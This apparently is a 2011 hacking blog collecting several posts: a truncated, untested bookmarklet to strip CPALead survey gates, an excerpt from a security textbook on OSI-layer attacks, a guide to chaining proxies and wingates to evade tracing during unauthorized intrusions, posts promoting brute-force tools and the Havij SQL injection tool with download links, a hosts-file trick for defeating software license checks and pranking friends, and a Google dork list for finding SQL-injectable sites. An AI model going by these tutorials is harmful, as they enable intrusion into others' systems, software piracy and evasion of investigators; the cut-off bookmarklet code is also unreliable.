Friday, June 17, 2011

How To Remove CPALead Surveys



In this tutorial I will show you how to remove CPALead surveys. Sometimes if you search on google for something, and you find it it may require to do a survey, but it may not be available. So here's a way to remove it and continue browsing.

Step 1:

Find a website which requires to do CPALead in order to browse the website.

Step 2:

Paste the following code in your address bar (you must have enabled javascript in order this to work Smile
Code:
javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);for(var j=x;j>0&&x-j<99;j--)window["clear"+z[i]](j);}})();var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r

Step 3:

Now its time for you to smile since CPALead Survey is removed.

Tip:
You could add the javascript into your bookmarks for faster and easily use. If you find a website which require CPALead survey, just open the bookmard and it's gone.


I hope this helped you.

Haven't Test it yet please if it works inform me it's in my usb stick forgot to test it Big Grin

Hack The STACK USING SNORT ETHERIAL ALL 8 LAYERS



Introduction
“Everything old becomes new again.”The goal of this chapter is to take the well-known
Open Systems Interconnect (OSI) model and use it to present security topics in a new and
unique way. While each of the subsequent chapters focuses on one individual layer, this
chapter offers a high-level overview of the entire book.
Our Approach to This Book
This book is compiled of issues and concerns that security professionals must deal with on a
daily basis. We look at common attack patterns and how they are made possible. Many
attacks occur because of poor protocol design; others occur because of poor programming or
lack of forethought when designing code. Finally, the tools that are useful for identifying and
analyzing exploits and exposures are discussed—the tools you will return to time and time
again.

WARNING
Many of the tools discussed in this book can be used by both security profes-
sionals and hackers. Always make sure you have the network owner’s permis-
sion before using any of these tools, which will save you from many headaches
and potential legal problems.

Tools of the Trade

The following sections examine “protocol analyzers” and the Intrusion Detection Systems
(IDSes), which are the two main tools used throughout this book.
Protocol Analyzers
Protocol analyzers (or sniffers) are powerful programs that work by placing the host system’s
network card into promiscuous mode, thereby allowing it to receive all of the data it sees in
that particular collision domain. Passive sniffing is performed when a user is on a hub. When
using a hub, all traffic is sent to all ports; thus, all a security professional or attacker has to do
is start the sniffer and wait for someone on the same collision domain to begin transmitting
data. A collision domain is a network segment that is shared but not bridged or switched;
packets collide because users are sharing the same bandwidth.
Sniffing performed on a switched network is known as active sniffing, because it switches
segment traffic and knows which particular port to send traffic to. While this feature adds
much needed performance, it also raises a barrier when attempting to sniff all potential

switched ports. One way to overcome this impediment is to configure the switch to mirror a
port. Attackers may not have this capability, so their best hope of bypassing the functionality
of the switch is through poisoning and flooding (discussed in subsequent chapters).
Sniffers operate at the data link layer of the OSI model, which means they do not have
to play by the same rules as the applications and services that reside further up the stack.
Sniffers can capture everything on the wire and record it for later review.They allow user’s
to see all of the data contained in the packet. While sniffers are still a powerful tool in the
hands of an attacker, they have lost some of their mystical status as many more people are
using encryption.
The sniffer used in this book is called Ethereal, which is free and works well in both a
Windows and a Linux environment. (Chapter 3 provides a more in-depth review of how to
install and use Ethereal.) If you’re eager to start using Ethereal, more details about the pro-
gram can be found at http://www.ethereal.com. (Ethereal’s name has been changed to Wireshark.)
Intrusion Detection Systems
Intrusion detection systems (IDSes) play a critical role in protecting the Information
Technology (IT) infrastructure. Intrusion detection involves monitoring network traffic,
detecting attempts to gain unauthorized access to a system or resource, and notifying the
appropriate individuals so that counteractions can be taken.The ability to analyze vulnerabili-
ties and attacks with a sniffer and then craft a defense with an IDS is a powerful combination.
The IDS system used in this book is Snort, which can be used with both Linux and Windows
and has industry wide support.

NOTE
Intrusion detection has a short history. In 1983, Dr. Dorothy Denning began
developing the first IDS, which would be used by the U.S. government to ana-
lyze the audit trails of government mainframe systems.
Snort is a freeware IDS developed by Martin Roesch and Brian Caswell. It’s a
lightweight, network-based IDS that can be set up on a Linux or Windows host. While the
core program uses a Command Line Interface (CLI), graphical user interfaces (GUIs) can
also be used. Snort operates as a network sniffer and logs activity that matches predefined
signatures. Signatures can be designed for a wide range of traffic, including Internet Protocol
(IP),Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and Internet
Control Message Protocol (ICMP).

Snort consists of two basic parts:
■ Header Where the rules “actions” are identified
■ Options Where the rules “alert messages” are identified
To learn more about Snort, go to http://www.Snort.org.

Organization of This Book
This book is arranged in the same manner as the layers of the OSI model, which was devel-
oped to provide organization and structure to the world of networking. In 1983, the
International Organization for Standardization (ISO) and the International Telegraph and
Telephone Consultative Committee (CCITT) merged documents and developed the OSI
model, which is based on a specific hierarchy where each layer builds on the output of each
adjacent layer (see ISO 7498).Today, it is widely used as a guide for describing the operation of
a networking environment, and also serves as a teaching model for hacks, attacks, and defenses.
The OSI model is a protocol stack where the lower layers deal primarily with hardware,
and the upper layers deal primarily with software.The OSI model’s seven layers are designed
so that control is passed down from layer to layer.The seven layers of the OSI model are
shown in Table 1.1

Table 1.1 The Seven-Layer OSI Model

Layer Responsibility
Application Application support such as File Transfer Protocol (FTP), Telnet, and
Hypertext Transfer Protocol (HTTP)
Presentation Encryption, Server Message Block (SMB), American Standard Code
for Information Interchange (ASCII), and formatting
Session Data flow control, startup, shutdown, and error detection/
correction
Transport End-to-end communications, UDP and TCP services
Network Routing and routable protocols such as IP and Open Shortest Path
First (OSPF). Path control and best effort at delivery
Data link Network interface cards, Media Access Control (MAC) addresses,
framing, formatting, and organizing data
Physical Transmission media such as twisted-pair cabling, wireless systems,
and fiber-optic cable
The OSI model functions as follows:
1. Information is introduced into the application layer and passed down until it ends
up at the physical layer.
2. Next, it is transmitted over the physical medium (i.e., wire, coax, or wireless) and
sent to the target device.
3. Once at the target device, it proceeds back up the stack to the application layer.
For this book, an eighth layer has been added to the OSI model that is called the
“people” layer (or “social” layer). Figure 1.1 shows the eight layers and interprets the services
of each.

NOTE
While the OSI model is officially seven layers, for the purposes of this book an
additional layer (layer 8 [the “people” layer]) has been added to better address
the different hacks and attacks that can occur in a networked environment.
Figure 1.1 Hack the Stack’s Eight Layers
The People Layer
Layer 8 is known as the people layer, and while not an official layer of the OSI model, it is an
important consideration; therefore, it has been added to the OSI model for this book. People
are often the weakest link. We can implement the best security solutions known at the lower
layers of the OSI model and still be vulnerable through people and employees. Social engi-
neering, phishing, phreaking, and dumpster diving are a few of the ways these attacks can be
carried out.

The Application Layer
Layer 7 is known as the application layer. Recognized as the official top layer of the OSI
model, this layer serves as the window for application services. Layer 7 is not the actual
application, but rather the channel through which applications communicate.
The Presentation Layer
Layer 6 is known as the presentation layer.The main purpose of the presentation layer is to
deliver and present data to the application layer.This data must be formatted so that the
application layer can understand and interpret it.The presentation layer is responsible for
items such as:
■ Encryption and decryption of messages
■ Compression and expansion of messages, format translation
■ Handling protocol conversion

The Session Layer
Layer 5 is known as the session layer. Its purpose is to allow two applications on different
computers to establish and coordinate a session. It is also responsible for managing the ses-
sion while information and data are being moved. When a data transfer is complete, the ses-
sion layer tears down the session. Session-layer protocols include:
■ Remote Procedure Call (RPC)
■ Structured Query Language (SQL)



The Transport Layer
Layer 4 is known as the transport layer. Whereas the application, presentation, and session
layers are primarily concerned with data, the transport layer is focused on segments.

Depending on the application protocol being used, the transport layer can send data either
quickly or reliably.Transport layer responsibilities include end-to-end error recovery and flow
control.The two primary protocols found on this layer include:
■ TCP A connection-oriented protocol; provides reliable communication using
handshaking, acknowledgments, error detection, and session teardown
■ UDP A connectionless protocol; offers speed and low overhead as its primary
advantage


The Network Layer
Layer 3 is known as the network layer, which is tied to software and deals with packets.The
network layer is the home of the IP, which offers best effort at delivery and seeks to find the
best route from the source to the target network. Network-layer components include:
■ Routers
■ Stateless inspection/packet filters


The Data Link Layer
Layer 2 is known as the data link layer and is focused on traffic within a single local area net-
work (LAN).The data link layer formats and organizes the data before sending it to the
physical layer. Because it is a physical scheme, hard-coded Mandatory Access Control (MAC)
addresses are typically used.The data link layer organizes the data into frames. When a frame
reaches the target device, the data link layer strips off the data frame and passes the data
packet up to the network layer. Data-link-layer components include:
■ Bridges
■ Switches
■ Network Interface Card (NIC)
■ MAC addresses


The Physical Layer
Layer 1 of the OSI model is known as the physical layer. Bit-level communication takes place
at layer 1. Bits have no defined meaning on the wire; however, the physical layer defines how
long each bit lasts and how it is transmitted and received. Physical layer components include
copper cabling, fiber cabling, wireless system components, and Ethernet hubs.The physical
layer in this book has been extended to include:

Perimeter security

■ Device Security
■ Identification and authentication
Common Stack Attacks
A range of exploits can be launched in any stack-based system. For this book, we followed
the stack-based approach of arranging the various attacks into a logical order for discussion
of the risks and potential solutions. Let’s look at some of the attacks and the layers where
they can be found.

The People Layer (SOCIAL ENGINERING)
One of the biggest threats at this layer is social engineering, because it targets people. Some
organizations spend a fortune on technical controls but next to nothing on training and edu-
cating employees on security processes and procedures. Attackers use various techniques
(e.g., trust) to trick individuals into complying with their wishes. As with other types of
attacks, the bulk of the work of a social engineering attack is doing the reconnaissance and
laying the groundwork.The attack itself usually takes on one of the following angles:
■ Diffusion of Responsibility I know the policy is not to give out passwords, but
I will take responsibility for this.
■ Identification We both work for the same company; this benefits everyone.
■ Chance for Ingratiation This is a win-win situation.The company is going to
reward you for helping me in this difficult situation.
■ Trust Relationships Although I am new here, I am sure I have seen you in the
break room.
■ Cooperation Together we can get this done.
■ Authority I know what the policy is; I drafted those policies and I have the right
to change them.
Another threat at the people layer is dumpster diving. Many companies throw out an
amazing amount of stuff (e.g., old hardware, software, post-it pads, organizational charts,
printouts of names and passwords, source code, memos and policy manuals). All of these
items offer a wealth of information to an attacker.
The Application Layer
Most of the applications listed in this section are totally insecure because they were written
for a different time. At the beginning of the networked world, most systems were mainframes

that were locked in government and business buildings.There were no Category 5 cables
interconnecting every office in the building, and no open wireless access points were being
broadcast from the apartment next door. Suppressing passwords and other critical informa-
tion on the monitor was considered robust enough to protect information and data. Here’s a
short list of some of the insecure applications and high-level protocols:

■ FTP FTP is a TCP service that operates on ports 20 and 21 and is used to move
files from one computer to another. Port 20 is used for the data stream, and trans-
fers the data between the client and the server. Port 21 is the control stream, and is
used to pass commands between the client and the FTP server. Attacks on FTP
target misconfigured directory permissions and compromised or sniffed cleartext
passwords. FTP is one of the most commonly hacked services.

■ Telnet Telnet is a TCP shell service that operates on port 23.Telnet enables a
client at one site to establish a session with a host at another site.The program
passes the information typed at the client’s keyboard to the host computer system.
While Telnet can be configured to allow anonymous connections, it should also be
configured to require usernames and passwords. Unfortunately, even then,Telnet
sends them in cleartext. When a user is logged in, he or she can perform any
allowed task.

■ Simple Mail Transfer Protocol (SMTP) This application is a TCP service that
operates on port 25, and is designed to exchange electronic mail between net-
worked systems. Messages sent through SMTP have two parts: an address header
and the message text. All types of computers can exchange messages with SMTP.
Spoofing and spamming are two of the vulnerabilities associated with SMTP.

■ Domain Name Service (DNS) This application operates on port 53, and per-
forms address translation. DNS converts fully qualified domain names (FQDNs)
into a numeric IP address and converts IP addresses into FQDNs. DNS uses UDP
for DNS queries and TCP for zone transfers. DNS is subject to poisoning and if
misconfigured, can be solicited to perform a full zone transfer.

■ Trivial File Transfer Protocol (TFTP) TFTP operates on port 69, and is a
connectionless version of FTP that uses UDP to reduce overhead and reliability. It
does so without TCP session management or authentication, which can pose a big
security risk. It is used to transfer router configuration files and to configure cable
modems. People hacking those cable modems are known as uncappers.

■ Hypertext Transfer Protocol (HTTP) HTTP is a TCP service that operates
on port 80. HTTP helped make the Web the popular service that it is today.The
HTTP connection model is known as a stateless connection. HTTP uses a request
response protocol where a client sends a request and a server sends a response.
Attacks that exploit HTTP can target the server, browser, or scripts that run on the
browser. Nimda is an example of the code that targeted a Web server.

■ Simple Network Management Protocol (SNMP) SNMP is a UDP service
that operates on ports 161 and 162, and was designed to be an efficient and inex-
pensive way to monitor networks.The SNMP protocol allows agents to gather
information (e.g., network statistics) and report back to their management stations.
Some of the security problems that plague SNMP are caused by the fact that com-
munity strings are passed as cleartext and the default community strings
(public/private) are well known. SNMP version 3 is the most current and offers
encryption for more robust security.

The Session Layer

There is a weakness in the security controls at the presentation and session layers. Let’s look at
the Windows NT LanMan (NTLM) authentication system. Originally developed for
Windows systems and then revised for Windows NT post service pack 2 systems, this secu-
rity control proved to be an example of weak encryption (i.e., many passwords encrypted
with this system could be cracked in less than 1 second because of the way Microsoft stored
the hashed passwords). An NTLM password is uppercase, padded to 14 characters, and
divided into seven character parts.The two hashed results are concatenated and stored as a
LAN Manager (LM) hash, which is stored in the SAM.The session layer is also vulnerable to
attacks such as session hijacking. Network Basic Input/Output System (NetBIOS) is another
service located in this area of the stack. (Subsequent chapters go into greater detail regarding
the various types of encryption (e.g., hashing).
NetBIOS was developed for IBM and adopted by Microsoft, and has become and
industry standard. It allows applications on different systems to communicate through the
LAN. On LANs, hosts using NetBIOS systems identify themselves using a 15-character
unique name. Since NetBIOS is non-routable, Microsoft adapted it to run over Transmission
Control Protocol/Internet Protocol (TCP/IP). NetBIOS is used in conjunction with SMB,
which allows for the remote access of shared directories and files.This key feature of
Windows makes file and print sharing and the Network Neighborhood possible. It also
introduced other potential vulnerabilities into the stack by giving attackers the ability to
enumerate systems and gather user names and accounts, and share information. Almost every
script kiddie and junior league hacker has exploited the net use command.
The Transport Layer
The transport layer is rife with vulnerabilities, because it is the home of UDP and TCP.
Because UDP is connectionless, it’s open for attackers to use for a host of denial of service
(DoS) attacks. It’s also easy to spoof and requires no confirmation.TCP is another used and
abused protocol. Port scanning and TCP make the hacker trade possible. Before a hacker can
launch an attack, he or she must know what is running and what to target.TCP makes this
possible. From illegal flag settings, NULL, and XMAS, to more common synchronous (SYN)
and reset (RST) scans,TCP helps attackers identify services and operating systems.

Extending OSI to Network Security

At the network level are services such as IP and ICMP. IPv4 has no security services
built in, which is why Secure Internet Protocol (IPSec) (a component of IPv6) was devel-
oped. Without IPSec, IP can be targeted for many types of attacks (e.g., DOS), abused
through source routing, and tricked into zombie scanning “IPID Scan.” While ICMP was
developed for diagnostics and to help with logical errors, it is also the target of misuse.
ICMP can be used to launch Smurf DoS attacks or can be subverted to become a covert
channel with programs such as Loki.

The Data Link Layer
The dangers are real at the data link layer. Conversion from logical to physical addressing
must be done between the network and data link layers. Address Resolution Protocol (ARP)
resolves logical to physical addresses. While critical for communication, it is also used by
attackers to bypass switches and monitor traffic, which is known as ARP poisoning. Even
without ARP poisoning, passive sniffing can be a powerful tool if the attacker positions him-
self or herself in the right place on the network.

The Physical Layer
An attacker gaining access to the telecommunications closet, an open port in the conference
room, or an unused office, could be the foothold needed to breach the network or, even
worse, gain physical access to a server or piece of equipment. It’s a generally accepted fact
that if someone gains physical access to an item, they can control it.The Cisco site provides a
page that explains how to reset the password and gain entry into a Cisco device
(http://www.cisco.com/warp/public/474/psw...500.html). Figure 1.2 lists each layer of the
stack and many of the common attacks and vulnerabilities found at those layers.

Any one Want Whole Book then tell me I will mail you

Change your identity while hacking or attacking !!!

Rainbow Change your identity while hacking or attaking !!!
Change your identity while hacking or attaking : BY BACKTRACK
Hi guys,
I’m going to assume that most of you have already used a proxy before to hide your real IP address or domain or maybe just used one to surf anonymously online. If you didn’t, well hopefully you can keep up and possibly learn how to use a proxy. Its also best if you know what an IP address or Domain is first, before reading this tutorial. Hmm, I guess I have to show you where to find a proxy too. Well I find that good, updated proxy websites are…

http://multiproxy.org/anon_proxy.htm ( Varifyed on 28.03.2011)
http://tools.rosinstrument.com/proxy/ ( Varifyed on 28.03.2011)


Proxy Servers
A proxy is a server that acts as a gateway between your computer and your destination (website, IRC chat, etc.). These proxies receive requests from users to view, for example, a web page. The proxy will then forward the request to the internet, find your requested page, then send the web page back to you, the user. Most proxies come with a cache (sounds like “cash”) feature that saves former websites that were visited on that proxy. Think of cache as a proxy’s storage room. Each site that you make the proxy visit, it saves in its own storage area (cache). So if the user or someone else requests the same site again later on, the proxy will go back into its cache, find the web page and send it back to the user. This saves time because the proxy doesn’t have to go search the Internet for the web page. It just pulls the site out of its cache.

The use of proxies to stay anonymous is a favorite thing to do among people on the Internet who are either paranoid or just security conscious. The anonymity factor comes from the proxy’s ability to hide your true Internet address. For example, if I were to run a scan on your computer right now, I would get the Internet address that was given to you by your ISP (internet service provider), but if I were to scan you while you were using a proxy, then I would get the Internet address of the proxy server. Basically the whole proxy picture looks like this…

[User]>>>>>[Proxy]>>>>>[Web Pages]

Simple enough, right? Right. So now let’s get to the chaining part.

Proxy Chaining
Proxy chaining is merely connecting to more than one proxy and then to your intended destination. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be. Remember, it doesn’t matter how many proxies you chain together, you will never be 100% anonymous. Let’s look at an example…

[User]>>>>>[Proxy1]>>>>>[Proxy2]>>>>>[Proxy3]>>>>>[Proxy4]>>>>>[Destination]

The example shows that for a proxy chain to be created, the user must first connect to Proxy1. Once the user is connected to Proxy1, from Proxy1, the user will connect to Proxy2, from Proxy2, the user will connect to Proxy3, from Proxy3, the user will connect to Proxy4, from Proxy4, the user will then connect to the intended destination (web page, Unix server, ftp server, etc.). All together we have 4 proxies in this example. Each proxy is a link in the chain. If the user would be scanned while on the proxy chain in the example, the IP address or domain of Proxy4 would appear on the scan. Now the problem with proxies is they tend to “die out” in a few weeks or less. It all depends. So if Proxy2 were to cease functioning, the chain wouldn’t work. You would need to get rid of Proxy2 and just use Proxy1, Proxy3, and Proxy4 or find another proxy to take Proxy2’s place. This is why proxy chaining can be a real pain if you are using them just to surf the net. If one dies, you have to figure out which one is the one not working, so you have to go through each one to check them or until you find the one that isn’t working.

Proxy chaining is a necessity if you plan on using proxies to execute a “hack”. If you are attempting to gain unauthorized remote access to any server, whether it is through telnet, ftp, or http, chaining is a must. As I said, you will never be 100% anonymous no matter what you do online so it is possible that you still can be tracked even if u chain proxies. Chaining just makes it a lot hard to track someone. To make it even harder, its best to use foreign proxies because if someone wanted to trace you, they would need to get logs of your use of each proxy from each proxy administrator. This could take quite a while or even never at all if one of the proxy’s, or all for that matter, belong to an admin in a country that isn’t too fond of the country you are located in. The longer it takes for the authorities to subpoena the logs of your usage of a single proxy from that proxy’s administrator, the more chance that the other proxies that you used in the chain will have their logs deleted by the time anyone gets to the server administrators of those proxies. So when attempting to do any kind of “hack or attack”, it’s best to use at least five or six proxies in a chain.

HTTP Chaining
HTTP chaining is basically chaining a proxy server in your browser’s address bar. Example:

http://proxy.server.com/-_-http://www.google.com

Notice how the above proxy and destination are seperated by a (-_-) If you wanted to make a chain out of this you would simply add another proxy ex. ( http://proxy.server1.com/-_-http://proxy...ation.com)

Another way to use proxys in your address bar is by adding the proxy IP or domain then the port number. Example…

http://anon.free.anonymizer.com:80/http:...google.com

Notice how the above proxy and destination server are seperated this time by a (/) forward slash instead of a (-_-) dash, underscore, dash. To make a chain out of this you would again simply add another proxy ex. ( http://proxy1:80/http://proxy2:80/proxy3:80/http://www.yahoo.com)

Browser Chaining
To browser chain is fairly easy. I’ll use Internet Explorer as an example since I believe it is the browser that most people have and use. First you need to find the Internet Options. You can do this by either finding the Explorer icon on the desktop, right click on it, then press properties or if you have a browser window already opened if you are online then you can go to Tools (or sometimes its View) and press Internet Options. Now that you have the Internet Options window up you can now go to the Connections tab, then go to the first Settings button (not LAN Settings, the one above it) and click it. Now you should be in the Settings box. Put a check in the box where it says to Use a proxy server. Now if you wanted to surf using one proxy you would merely put the proxy in the Address: space and put the proxy’s port number in the Port: space. To use a chain here you would put in a proxy along with a “:” colon then the port number followed by a space separting the next proxy then a “:” colon then the port number then a space and so on. The last proxy you add should have its port number placed inside the Port: space. If you did it, then it should look like this exactly…

Note: before putting proxy in chain, please check by pinging whether it is alive or not,
Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80

***Notice that each proxy:port is separated by a space and that the last proxy has its port number placed in the Port: space. Do not check the box marked “Bypass proxy server for local addresses”. Press OK when you see that everything is in working order***

Wingates
A wingate is a proxy server that someone installs onto his/her computer which allows for a single or multiple online connection to take place through port 23, the default telnet port. Depending on their security, some wingates will allow anyone online to connect to them and usually stay “alive” or “working” anywhere from a few days to even months. There are people out there that scan for these Wingates and post the computer’s IP number or domain on their website to give anyone online a free list of them to use. You can also scan them yourself by using programs like WinScan.

Chaining Wingates Using Telnet
I’m going to assume you already know what telnet is so I will just get right down to it. To chain using telnet, you would first bring up the DOS prompt and type in “telnet” then your wingate. (Since telnet’s default port is 23 and all wingates run on port 23, the port number is not necessary but I will add it just to show you how you should type any port number out on screen) Example…

C:\WINDOWS>telnet 61.133.119.130 23

So now you have “telnet”, a space, the wingate IP, a space, then the port number 23. Once you are connected to the wingate it should look like this…

Wingate>

Now you would type your next wingate and port number in, then press enter like so…

Wingate> 203.207.173.166 23

You can continue to do this until you connected to as many Wingates as you need. Once you are finished with your wingates you would connect to your destination. Example…

WinGate>arbornet.org

So now the entire picture would look something like this…

C:\Windows> telnet 61.133.119.130 23

Wingate>203.207.173.166 23

Wingate>135.245.18.167 23

Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

you are connected without your identity.

Note: This is highly recommended that before putting proxy in chain, please check whether proxy is alive or not else your chain will not work.


.Thanks for reading !!!

HOW TO HACK HTTP, FTP, AND ROUTER PASSWORDS



[b][b]HOW TO HACK HTTP, FTP, AND ROUTER PASSWORDS
A Brute-force attack is nothing more than guessing a user ID/Password combination. Use Brute force attack tools like THC-HYDRA, BRUTUS.
THC-HYDRA:
THC-HYDRA is remotely dictionary attack tool from The Hacker’s Choice group. It’s a well made tool that supports a lot of protocol and options. The following protocols are supported: TELNET, FTP, HTTP, HTTPS,HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2, Cisco AAA
DOWNLOAD URL:http://freeworld.thc.org/thc-hydra/
BRUTUS:
Brutus is one of the fastest, most flexible remote password crackers you can get your hands on it’s also free. It’s available for windows 9x, NT and 2000, there is no UNIX version available although it is a possibility at some point in the future. Brutus was first made publicly available in Oct 1998 and since that time there have been at least 70,000 downloads and 175,000 visitors to this page. Development continues so new releases will be available in the near future. Brutus was written originally to help check routers etc. For default and common passwords.
Brutus version AET2 is the current release and includes the following authentication types:
HTTP [Basic authentication]
HTTP [HTML Form/CGI]
POP3, FTP, SMB, Telnet
Other types such as IMAP, NNTP, and NETBUS etc are freely downloadable from this site and simply ignored into your copy of Brutus. You can create your own types or use other peoples.
The current release includes the following functionality:
Multi-stage authentication engine
60 simultaneous target connection
No username, single and multiple modes
Password list and brute force modes
Load and resume position
Highly customizable authentication sequence
SOCKS proxy support for all authentication types
User and Password list generation and manipulation functionality
HTML Form interpretation for HTML Form/CGI authentication types
Error handling and recovery capability inc.resume after crash/failure

DOWNLOAD URL:
http://www.hobbie.net/brutus/brutus-download.html
[/b]
[/b]

"InTegRatINg De INtellIgEnCE"

Footprinting



What Is Footprinting?

Footprinting is the first and most convenient way that hackers use to gather information
about computer systems and the companies they belong to. The purpose of footprinting to
learn as much as you can about a system, it's remote access capabilities, its ports and
services, and the aspects of its security.

In order to perform a successful hack on a system, it is best to know as much as you can,
if not everything, about that system. While there is nary a company in the world that
isn't aware of hackers, most companies are now hiring hackers to protect their systems.
And since footprinting can be used to attack a system, it can also be used to protect it.
If you can find anything out about a system, the company that owns that system, with the
right personell, can find out anything they want about you.

In this talk, I will explain what the many functions of footprinting are and what they do.
I'll also footprint everyone's favorite website, just to see how much info we can get on
Grifter.


¥ Open Source Footprinting

Open Source Footprinting is the easiest and safest way to go about finding information
about a company. Information that is available to the public, such as phone numbers,
addresses, etc. Performing whois requests, searching through DNS tables, and scanning
certain IP addresses for open ports, are other forms of open source footprinting. Most
of this information is fairly easy to get, and getting it is legal, legal is always good.

Most companies post a shit load of information about themselves on their website. A lot
of this information can be very useful to hackers and the companies don't even realize it.
It may also be helpful to skim through the webpage's HTML source to look for comments.
Comments in HTML code are the equivalent to the small captions under the pictures in high
school science books. Some comments found in the HTML can hold small tid-bits of info
about the company, otherwise not found anywhere else.

¥ Network Enumeration

Network Enumeration is the process of identifying domain names and associated networks.
The process is performing various queries on the many whois databases found on the
internet. The result is the hacker now having the information needed to attack the system
they are learning about. Companie's domain names are listed with registrars, and the
hacker would simply query the registrar to obtain the information they are looking for.
The hacker simply needs to know which registrar the company is listed with. There are
five types of queries which are as follows:

Registrar Query: This query gives information on potential domains matching the
target.

Organizational Query: This is searching a specific registrar to obtain all
instances of the target's name. The results show many different domains associated
with the company.

Domain Query: A domain query is based off of results found in an organizational
query. Using a domain query, you could find the company's address, domain name,
administrator and his/her phone number, and the system's domain servers. The
administrative contact could be very useful to a hacker as it provides a purpose
for a wardialer. This is also where social engineering comes into play. But
that's a talk for another time. Many administrators now post false phone numbers
to protect themselves from this.

Network Query: The fourth method one could use the American Registry for Internet
Numbers is to discover certain blocks owned by a company. It's good to use a
broad search here, as well as in the registrar query.

POC Query: This query finds the many IP adresses a machine may have.

¥ DNS Interrogation

After gathering the information needed using the above techniques, a hacker would begin to
query the DNS. A common problem with system adminstrators is allowing untrusted, or worse,
unknown users, to perform a DNS Zone Transfer. Many freeware tools can be found on the
internet and can be used to perform DNS interrogation. Tools such as nslookup, for PC, and
AGnet Tools, for Mac, are some common programs used for this.

¥ Other Helpful Techniques Used In Footprinting

Ping Sweep: Ping a range of IP addresses to find out which machines are awake.

TCP Scans: Scan ports on machines to see which services are offered. TCP scans
can be performed by scanning a single port on a range of IPs, or by scanning a
range of ports on a single IP. Both techniques yeild helpful information.

UDP Scans: Send garbage UDP packets to a desired port. I normally don't perform
UDP scans a whole lot because most machines respond with an ICMP 'port unreachable'
message. Meaning that no service is available.

OS Indentification: This involves sending illegal ICMP or TCP packets to a machine.

The machine responds with unique invalid inputs and allows the hacker to find out what the
target machine is running.

how to block websites without using any softwares


FOLLOW THESE STEPS:

1. Navigate to C:\WINDOWS\system32\drivers\etc
2. Find the file named "HOSTS" and open it in notepad
3. Under "127.0.0.1 localhost" Add "127.0.0.2 http://www.target.com"
4. Then the site named http://www.target.com wont be accessable from that pc.
5. Just add "1" to last number in internal ip
eg : 127.0.0.2 http://www.yahoo.com
127.0.0.3 http://www.google.com

This is a simple trick.But has many uses.

USES LIKE:--->

1) If a website is not accessable from your pc,then check the file named "hosts" and remove the line blocking that site.


2) If you want to block some products from checking the reg key you provided,block that website from where it checks.This website can be obtained by using a network management tool.Close everything connected to internet and let the product check the key online.then open the network management tool and find the name of the server to which your pc has connections.That will be the site from which the product verifies the keys.Then block that server and provide a new key if it is valid,the product will accept this and it will never get a chance to verify it.So you can use that forever by using a fake key.(Remember,this is not guaranteed 100% success)


3)U can code simple programs in batch or something,which edits the "hosts" file and blocks popular websites.Then send this to your friends and make fool out of them.


4)Find other uses by yourself.


This is not a great tutorial.It is just a simple thing that you might find very useful if you find its correct applications.Hope you like it.+rep if u wish to.Thank you.
RolleyesCool

Sumit Shukla
How to Configure Squid Proxy Server in a Network =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How To Create Squid Proxy Server
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Sure Squid server is a popular open source GPLd proxy and web cache. It has a variety of uses, from speeding up a web server by caching repeated requests, to caching web, name server query , and other network lookups for a group of people sharing network resources. It is primarily designed to run on Linux / Unix-like systems. Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. Unlike traditional caching software, Squid handles all requests in a single, non-blocking, I/O-driven process. Squid keeps meta data and especially hot objects cached in RAM, caches DNS lookups, supports non-blocking DNS lookups, and implements negative caching of failed requests. Squid consists of a main server program squid, a Domain Name System lookup program (dnsserver), a program for retrieving FTP data (ftpget), and some management and client tools.

==============================
Install Squid on CentOS / RHEL 5
==============================

Use yum command as follows:

Thursday, June 16, 2011

Havij v1.14 Advanced SQL Injection

Description:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

 What's New?

* Sybase (ASE) database added.
* Sybase (ASE) Blind database added.
* Time based method for MsSQL added.
* Time based method for MySQL added.
* mod_security bypass added.
* Pause button added.
* Basic authentication added
* Digest authentication added.
* Post Data field added
* bugs related with dot character in database name fixed
* syntax over writing when defined by user in blind injections fixed.
* mssql database detection from error when using JDBC driver corrected.
* time out bug in md5 cracker fixed.
* default value bug fixed
* string encode bug fixed in PostgreSQL
* injecting URL rewrite pages added.
* injecting into any part of http request like Cookie, User-Agent, Referer, etc made available
* a bug in finding string column fixed. (specially for MySQL)
* Finding columns count in mysql when input value is non effective added.
* window resize bug in custom DPI setting fixed.
* some bugs in finding row count fixed.
* getting database name in mssql error based when injection type is guessed integer but it's string fixed.

Download :-

http://itsecteam.com/files/havij/Havij1.14Free.rar

Sumit shukla

Huge Dork List for SQLi

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?id=
inurl:play_old.php?id=
inurl:newsitem.php?id=
inurl:readnews.php?id=
inurl:top10.php?id=
inurl:historialeer.php?id=
inurl:reagir.php?id=
inurl:Stray-Questions-View.php?id=
inurl:forum_bds.php?id=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
